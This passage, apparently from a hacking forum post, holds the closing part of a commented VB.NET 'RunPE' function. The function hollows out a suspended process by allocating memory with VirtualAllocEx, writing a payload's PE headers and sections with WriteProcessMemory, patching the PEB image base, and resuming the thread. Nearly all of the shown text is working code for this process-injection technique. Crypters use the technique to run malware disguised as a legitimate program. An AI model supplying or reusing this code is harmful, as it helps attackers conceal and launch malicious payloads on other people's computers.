[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           End If[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           Dim dwSizeOfImage As Integer = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H50)[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           Dim dwNewImageBase As Integer = VirtualAllocEx(PI.hProcess, dwImageBase, dwSizeOfImage, &H3000, &H40) 'COMMENT: Makes the process ready to write in by specifying how much space we need to do it and where we need it[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           If dwNewImageBase = 0 Then Throw New Exception()[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           Dim dwSizeOfHeaders As Integer = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H54)[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           If Not WriteProcessMemory(PI.hProcess, dwNewImageBase, payload, dwSizeOfHeaders, ReadWrite) Then Throw New Exception() 'Writes the size of the payloads PE header to the target[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           'COMMENT: This is here where most of the magic happens. We write in all our sections data, which contains our resssources, code and the information to utilize the sections: VirtualAddress, SizeOfRawData and PointerToRawData[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           Dim SizeOfOptionalHeader As Short = BitConverter.ToInt16(payload, dwPEHeaderAddress + &H14)[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           Dim SectionOffset As Integer = dwPEHeaderAddress + (&H16 + SizeOfOptionalHeader + &H2)[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           Dim NumberOfSections As Short = BitConverter.ToInt16(payload, dwPEHeaderAddress + &H6)[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           For I As Integer = 0 To NumberOfSections - 1[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]               Dim VirtualAddress As Integer = BitConverter.ToInt32(payload, SectionOffset + &HC)[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]               Dim SizeOfRawData As Integer = BitConverter.ToInt32(payload, SectionOffset + &H10)[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]               Dim PointerToRawData As Integer = BitConverter.ToInt32(payload, SectionOffset + &H14)[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]               If Not SizeOfRawData = 0 Then[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]                   Dim SectionData(SizeOfRawData - 1) As Byte[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]                   Buffer.BlockCopy(payload, PointerToRawData, SectionData, 0, SectionData.Length)[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]                   If Not WriteProcessMemory(PI.hProcess, dwNewImageBase + VirtualAddress, SectionData, SectionData.Length, ReadWrite) Then Throw New Exception()[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]               End If[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]               SectionOffset += &H28[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           Next[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           Dim PointerData As Byte() = BitConverter.GetBytes(dwNewImageBase)[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           If TargetIs64 = True Then[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]               If Not WriteProcessMemory(PI.hProcess, PEBAddress64 + &H10, PointerData, 4, ReadWrite) Then Throw New Exception() 'Writes the new etrypoint for 64bit target[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           Else[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]               If Not WriteProcessMemory(PI.hProcess, PEBAddress32 + &H8, PointerData, 4, ReadWrite) Then Throw New Exception() 'Writes the new entrypoint for 32bit target[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           End If[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           If ResumeThread(PI.hThread) = -1 Then Throw New Exception() 'Resumes the suspended target with all its new exciting data[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]       Catch ex As Exception[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           Dim P As Process = Process.GetProcessById(CInt(PI.dwProcessId))[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           If P IsNot Nothing Then P.Kill()[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           Return False[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]       End Try[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]       Return True[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   End Function[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]#End Region[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][size=small][font=Roboto, sans-serif]End Class
 
Top